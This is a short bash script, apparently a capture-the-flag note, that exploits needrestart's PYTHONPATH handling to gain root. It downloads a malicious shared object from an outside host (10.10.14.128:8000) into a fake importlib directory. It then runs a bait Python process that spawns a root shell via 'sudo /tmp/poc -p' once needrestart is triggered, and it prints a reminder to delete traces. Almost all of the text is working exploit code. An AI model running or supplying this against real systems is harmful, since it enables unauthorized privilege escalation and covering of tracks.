🧠Conv

/usr/sbin/needrestart

#!/bin/bash
set -e
cd /tmp

mkdir -p malicious/importlib
curl http://10.10.14.128:8000/__init__.so -o /tmp/malicious/importlib/__init__.so

cat << 'EOF' > /tmp/malicious/e.py
import time
import os

while True:
    try:
        import importlib
    except:
        pass
    if os.path.exists("/tmp/poc"):
        print("Got shell!, delete traces in /tmp/poc, /tmp/malicious")
        os.system("sudo /tmp/poc -p")
        break
    time.sleep(1)
EOF
echo "Bait process is running. Trigger 'sudo /usr/sbin/needrestart' in another shell."
cd /tmp/malicious; PYTHONPATH="$PWD" python3 e.py 2>/dev/null